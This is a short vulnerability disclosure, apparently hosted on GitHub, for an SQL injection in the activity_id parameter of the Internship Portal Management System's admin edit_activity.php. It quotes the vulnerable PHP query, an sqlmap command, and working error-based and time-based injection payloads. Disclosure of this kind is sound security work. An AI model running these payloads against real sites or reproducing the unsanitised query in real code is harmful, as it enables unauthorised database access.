-
Notifications
You must be signed in to change notification settings - Fork 0
/
Internship-Portal-Management-System-06
36 lines (26 loc) · 1.21 KB
/
Internship-Portal-Management-System-06
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
Internship Portal Management System - SQL Injection on (admin/edit_activity.php?activity_id=1)
Vendor Homepage:
https://www.sourcecodester.com/php/11712/internship-portal-management-system.html
Version:V1.0
Tested on: PHP, Apache, MySQL
Affected Page:
edit_activity.php
On this page,activity_id parameter is vulnerable to SQL Injection Attack
Source Code(intern_sys/admin/edit_activity.php):
<?php
$q_activity = $conn->query("SELECT * FROM `activity` WHERE `activity_id` = '$_REQUEST[activity_id]'") or die($conn->error);
$f_activity = $q_activity->fetch_array();
?>
Proof of vulnerability(Verify using the sqlmap tool after logining):
-> sqlmap -u http://localhost/intern_sys/admin/edit_activity.php?activity_id=1 --batch
Output:
---
Parameter: activity_id (GET)
Type: error-based
Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
Payload: activity_id=1' AND GTID_SUBSET(CONCAT(0x716a766271,(SELECT (ELT(7692=7692,1))),0x716b6a7171),7692)-- MjlX
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: activity_id=1' AND (SELECT 8537 FROM (SELECT(SLEEP(5)))VdHg)-- gjQm
---
[08:47:49] [INFO] the back-end DBMS is MySQL